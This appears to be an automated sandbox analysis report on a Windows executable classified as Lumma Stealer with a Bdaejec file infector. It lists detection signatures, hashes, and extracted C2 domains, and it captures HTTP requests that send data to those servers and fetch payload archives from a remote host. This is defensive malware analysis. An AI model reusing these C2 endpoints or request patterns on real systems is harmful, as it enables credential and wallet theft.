Windows Analysis Report
current[1].exe

Overview

General Information

Sample name: current[1].exe
Analysis ID: 1480805
MD5: cd7329155530fb805abb2cace9b32134
SHA1: a73cd6bb4b42e19756d56289324787b562b07225
SHA256: ab58f2c394aead605975f0ef099f51af8c5a70d2ecfeac3710cb5905409d03f2
Tags: exe

Detection

LummaC, Bdaejec, LummaC Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Yara detected Bdaejec
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Infects executable files (exe, dll, sys, html)
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has a writeable .text section
Sample uses string decryption to hide its real strings
Uses known network protocols on non-standard ports
AV process strings found (often used to terminate AV products)
Contains functionality to call native functions
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

Classification

Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

AV Detection

Source: current[1].exe Avira: detected
Source: http://ddos.dnsnb8.net:799/cj//k2.rar URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rar URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rarDownloadManagerA Avira URL Cloud: Label: phishing
Source: triangleseasonbenchwj.shop Avira URL Cloud: Label: phishing
Source: sofahuntingslidedine.shop Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rarh? Avira URL Cloud: Label: malware
Source: modestessayevenmilwek.shop Avira URL Cloud: Label: malware
Source: https://sofahuntingslidedine.shop/api Avira URL Cloud: Label: phishing
Source: secretionsuitcasenioise.shop Avira URL Cloud: Label: phishing
Source: https://sofahuntingslidedine.shop/ Avira URL Cloud: Label: phishing
Source: https://sofahuntingslidedine.shop/u Avira URL Cloud: Label: phishing
Source: gemcreedarticulateod.shop Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rarl Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rarp Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rark Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rarE0 Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rarm Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarT Avira URL Cloud: Label: phishing
Source: https://sofahuntingslidedine.shop/apik Avira URL Cloud: Label: phishing
Source: culturesketchfinanciall.shop Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rarcC: Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rarN Avira URL Cloud: Label: phishing
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files\7-Zip\Uninstall.exe Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe Avira: detection malicious, Label: TR/Dldr.Small.Z.haljq
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe Avira: detection malicious, Label: W32/Jadtre.B
Source: 0.2.current[1].exe.400000.0.raw.unpack Malware Configuration Extractor: LummaC {"C2 url": ["sofahuntingslidedine.shop", "culturesketchfinanciall.shop", "triangleseasonbenchwj.shop", "modestessayevenmilwek.shop", "liabilityarrangemenyit.shop", "claimconcessionrebe.shop", "secretionsuitcasenioise.shop", "gemcreedarticulateod.shop", "sofahuntingslidedine.shop"], "Build id": "P6Mk0M--key"}
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Joe Sandbox ML: detected
Source: C:\Program Files\7-Zip\Uninstall.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe Joe Sandbox ML: detected
Source: current[1].exe Joe Sandbox ML: detected
Source: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp String decryptor: sofahuntingslidedine.shop
Source: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp String decryptor: culturesketchfinanciall.shop
Source: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp String decryptor: triangleseasonbenchwj.shop
Source: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp String decryptor: modestessayevenmilwek.shop
Source: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp String decryptor: liabilityarrangemenyit.shop
Source: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp String decryptor: claimconcessionrebe.shop
Source: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp String decryptor: secretionsuitcasenioise.shop
Source: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp String decryptor: gemcreedarticulateod.shop
Source: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp String decryptor: sofahuntingslidedine.shop
Source: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp String decryptor: - Screen Resoluton:
Source: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp String decryptor: Workgroup: -
Source: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp String decryptor: P6Mk0M--key

Compliance

Source: C:\Users\user\Desktop\current[1].exe Unpacked PE file: 0.2.current[1].exe.400000.0.unpack
Source: current[1].exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\current[1].exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr
Source: Binary string: .C:\yatafekubigu\xegoh\kegokececana\hobof.pdb source: current[1].exe
Source: Binary string: C:\yatafekubigu\xegoh\kegokececana\hobof.pdb source: current[1].exe

Spreading

Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe System file written: C:\Program Files\7-Zip\Uninstall.exe
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe Code function: 1_2_00E929E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose, 1_2_00E929E2
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe Code function: 1_2_00E92B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread, 1_2_00E92B8C
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then cmp dword ptr [ecx], eax 0_2_00462440
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then inc edi 0_2_004238A0
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then jmp eax 0_2_00427139
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then jmp eax 0_2_0042A182
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then jmp eax 0_2_0042A190
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then jmp eax 0_2_00428251
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then mov byte ptr [ebx], al 0_2_0044A22D
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then jmp ecx 0_2_00461236
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then jmp ecx 0_2_00461234
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then mov byte ptr [ebx], al 0_2_00448B92
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then mov esi, ecx 0_2_004143C0
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then cmp al, 2Eh 0_2_00445430
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then jmp eax 0_2_00430480
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then mov edx, dword ptr [ecx+esi+3Ch] 0_2_0045C480
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then mov eax, dword ptr [esi+2Ch] 0_2_00430565
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then jmp esi 0_2_00461516
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then lea eax, dword ptr [edi+04h] 0_2_004305F1
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then jmp eax 0_2_0042D639
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then test eax, eax 0_2_004596F2
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then xor ebx, ebx 0_2_0042A732
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then mov eax, edx 0_2_0041E7C0
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then jmp eax 0_2_004387C0
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then jmp eax 0_2_004387BB
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then jmp ecx 0_2_00460846
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then jmp eax 0_2_0042B802
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then jmp eax 0_2_00445807
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then cmp dword ptr [edx-08h], edi 0_2_00464800
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then jmp eax 0_2_0042A805
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then jmp eax 0_2_0042AB0E
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then jmp eax 0_2_004458D7
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then jmp eax 0_2_004458F2
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then jmp eax 0_2_004478BD
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then jmp eax 0_2_00447947
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then jmp eax 0_2_00447962
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then mov edi, C6989171h 0_2_0042B913
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then cmp dword ptr [ecx], eax 0_2_0042E920
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then mov eax, dword ptr [00475144h] 0_2_0043C990
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then push dword ptr [esi+4Ch] 0_2_00445A02
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then cmp dword ptr [ecx], eax 0_2_0045CA90
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then mov byte ptr [edx], bl 0_2_00425C07
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then movzx esi, word ptr [ecx+eax*4] 0_2_0041CD30
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then movzx ebx, byte ptr [edx+edi] 0_2_00401EE0
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then mov eax, dword ptr [0047E78Ch] 0_2_0045FEE3
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then mov word ptr [ecx], dx 0_2_0042FF6C
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then mov eax, dword ptr [0047E78Ch] 0_2_0045FEE3
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then cmp byte ptr [ebx], 00000000h 0_2_00429F35
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then movzx ebx, byte ptr [edx+edi] 0_2_00742147
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then mov word ptr [ecx], dx 0_2_007701D3
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then cmp byte ptr [ebx], 00000000h 0_2_0076A19C
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then jmp eax 0_2_0076A3F7
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then jmp eax 0_2_0076A3E9
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then jmp eax 0_2_007673A0
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then jmp eax 0_2_007684B8
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then mov byte ptr [ebx], al 0_2_0078A494
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then mov byte ptr [ebx], al 0_2_00788DF9
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then mov esi, ecx 0_2_00754627
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then jmp eax 0_2_007706E7
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then mov edx, dword ptr [ecx+esi+3Ch] 0_2_0079C6E7
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then cmp dword ptr [ecx], eax 0_2_007A26A7
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then cmp al, 2Eh 0_2_00785697
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then mov eax, dword ptr [esi+2Ch] 0_2_007707CC
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then lea eax, dword ptr [edi+04h] 0_2_00770858
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then jmp eax 0_2_0076D8A0
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then test eax, eax 0_2_00799959
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then xor ebx, ebx 0_2_0076A999
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then jmp eax 0_2_0076AD75
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then jmp eax 0_2_00785A73
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then jmp eax 0_2_0076AA6C
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then cmp dword ptr [edx-08h], edi 0_2_007A4A67
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then jmp eax 0_2_0076BA69
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then jmp eax 0_2_00778A27
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then mov eax, edx 0_2_0075EA27
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then jmp eax 0_2_00778A22
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then mov eax, dword ptr [esi+000000B8h] 0_2_00769ABD
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then mov edi, C6989171h 0_2_0076BB7A
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then jmp eax 0_2_00785B59
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then jmp eax 0_2_00785B3E
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then jmp eax 0_2_00787B24
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then inc edi 0_2_00763B07
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then mov eax, dword ptr [00475144h] 0_2_0077CBF7
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then jmp eax 0_2_00787BC9
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then jmp eax 0_2_00787BAE
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then cmp dword ptr [ecx], eax 0_2_0076EB87
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then push dword ptr [esi+4Ch] 0_2_00785C69
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then cmp dword ptr [ecx], eax 0_2_0079CCF7
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then mov byte ptr [edx], bl 0_2_00765E6E
Source: C:\Users\user\Desktop\current[1].exe Code function: 4x nop then movzx esi, word ptr [ecx+eax*4] 0_2_0075CF97

Networking

Source: Malware configuration extractor URLs: sofahuntingslidedine.shop
Source: Malware configuration extractor URLs: culturesketchfinanciall.shop
Source: Malware configuration extractor URLs: triangleseasonbenchwj.shop
Source: Malware configuration extractor URLs: modestessayevenmilwek.shop
Source: Malware configuration extractor URLs: liabilityarrangemenyit.shop
Source: Malware configuration extractor URLs: claimconcessionrebe.shop
Source: Malware configuration extractor URLs: secretionsuitcasenioise.shop
Source: Malware configuration extractor URLs: gemcreedarticulateod.shop
Source: Malware configuration extractor URLs: sofahuntingslidedine.shop
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 799
Source: global traffic TCP traffic: 192.168.2.4:49730 -> 44.221.84.105:799
Source: Joe Sandbox View IP Address: 44.221.84.105
Source: Joe Sandbox View IP Address: 188.114.96.3
Source: Joe Sandbox View IP Address: 188.114.96.3
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: sofahuntingslidedine.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Cookie: __cf_mw_byp=_2SNjID_zmQ4tMLgutu16zJ8STSYOqYvGDcmnrSWpYo-1721859949-0.0.1.1-/api
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 52
    Host: sofahuntingslidedine.shop
Source: global traffic HTTP traffic detected: GET /cj//k1.rar HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: ddos.dnsnb8.net:799
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k2.rar HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: ddos.dnsnb8.net:799
    Connection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe Code function: 1_2_00E91099 wsprintfA,WinExec,lstrlen,wsprintfA,wsprintfA,URLDownloadToFileA,lstrlen,Sleep, 1_2_00E91099
Source: global traffic HTTP traffic detected: GET /cj//k1.rar HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: ddos.dnsnb8.net:799
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k2.rar HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: ddos.dnsnb8.net:799
    Connection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: ddos.dnsnb8.net
Source: global traffic DNS traffic detected: DNS query: sofahuntingslidedine.shop
Source: unknown HTTP traffic detected: POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: sofahuntingslidedine.shop
Source: jJEAWO.exe, 00000001.00000003.1675913190.0000000000E80000.00000004.00001000.00020000.00000000.sdmp, jJEAWO.exe, 00000001.00000002.1862470986.0000000000E93000.00000002.00000001.01000000.00000004.sdmp String found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
Source: jJEAWO.exe, 00000001.00000003.1683352875.000000000107B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
Source: jJEAWO.exe, 00000001.00000003.1683352875.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, jJEAWO.exe, 00000001.00000003.1683579567.00000000010B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarE0
Source: jJEAWO.exe, 00000001.00000003.1683506510.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, jJEAWO.exe, 00000001.00000003.1683352875.00000000010B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarT
Source: jJEAWO.exe, 00000001.00000003.1683352875.00000000010EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarcC:
Source: jJEAWO.exe, 00000001.00000002.1862651851.000000000105E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar
Source: jJEAWO.exe, 00000001.00000002.1862651851.000000000109F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarDownloadManagerA
Source: jJEAWO.exe, 00000001.00000002.1862651851.00000000010B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarN
Source: jJEAWO.exe, 00000001.00000002.1862651851.00000000010B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarh?
Source: jJEAWO.exe, 00000001.00000002.1862651851.000000000105E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rark
Source: jJEAWO.exe, 00000001.00000002.1862651851.00000000010B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarl
Source: jJEAWO.exe, 00000001.00000002.1862651851.000000000105E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarm
Source: jJEAWO.exe, 00000001.00000002.1863177242.0000000002DBA000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarp
Source: Amcache.hve.1.dr String found in binary or memory: http://upx.sf.net
Source: SciTE.exe.1.dr String found in binary or memory: http://www.activestate.com
Source: SciTE.exe.1.dr String found in binary or memory: http://www.activestate.comHolger
Source: SciTE.exe.1.dr String found in binary or memory: http://www.baanboard.com
Source: SciTE.exe.1.dr String found in binary or memory: http://www.baanboard.comBrendon
Source: SciTE.exe.1.dr String found in binary or memory: http://www.develop.com
Source: SciTE.exe.1.dr String found in binary or memory: http://www.develop.comDeepak
Source: SciTE.exe.1.dr String found in binary or memory: http://www.lua.org
Source: SciTE.exe.1.dr String found in binary or memory: http://www.rftp.com
Source: SciTE.exe.1.dr String found in binary or memory: http://www.rftp.comJosiah
Source: SciTE.exe.1.dr String found in binary or memory: http://www.scintilla.org
Source: SciTE.exe.1.dr String found in binary or memory: http://www.scintilla.org/scite.rng
Source: SciTE.exe.1.dr String found in binary or memory: http://www.spaceblue.com
Source: SciTE.exe.1.dr String found in binary or memory: http://www.spaceblue.comMathias
Source: jJEAWO.exe, 00000001.00000003.1683506510.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, jJEAWO.exe, 00000001.00000002.1862651851.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, jJEAWO.exe, 00000001.00000003.1683352875.00000000010B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com2
Source: current[1].exe, 00000000.00000002.2053363980.00000000008DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sofahuntingslidedine.shop/
Source: current[1].exe, 00000000.00000003.2020633565.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, current[1].exe, 00000000.00000002.2053204670.00000000008BE000.00000004.00000020.00020000.00000000.sdmp, current[1].exe, 00000000.00000003.2020575396.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, current[1].exe, 00000000.00000003.1707640338.00000000008B3000.00000004.00000020.00020000.00000000.sdmp, current[1].exe, 00000000.00000002.2052970229.000000000081E000.00000004.00000020.00020000.00000000.sdmp, current[1].exe, 00000000.00000003.2020471181.00000000008BE000.00000004.00000020.00020000.00000000.sdmp, current[1].exe, 00000000.00000002.2053363980.00000000008DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sofahuntingslidedine.shop/api
Source: current[1].exe, 00000000.00000003.2020633565.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, current[1].exe, 00000000.00000003.2020575396.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, current[1].exe, 00000000.00000002.2053363980.00000000008DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sofahuntingslidedine.shop/apik
Source: current[1].exe, 00000000.00000003.2020471181.000000000089A000.00000004.00000020.00020000.00000000.sdmp, current[1].exe, 00000000.00000003.1707811358.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, current[1].exe, 00000000.00000002.2053204670.000000000089A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sofahuntingslidedine.shop/u
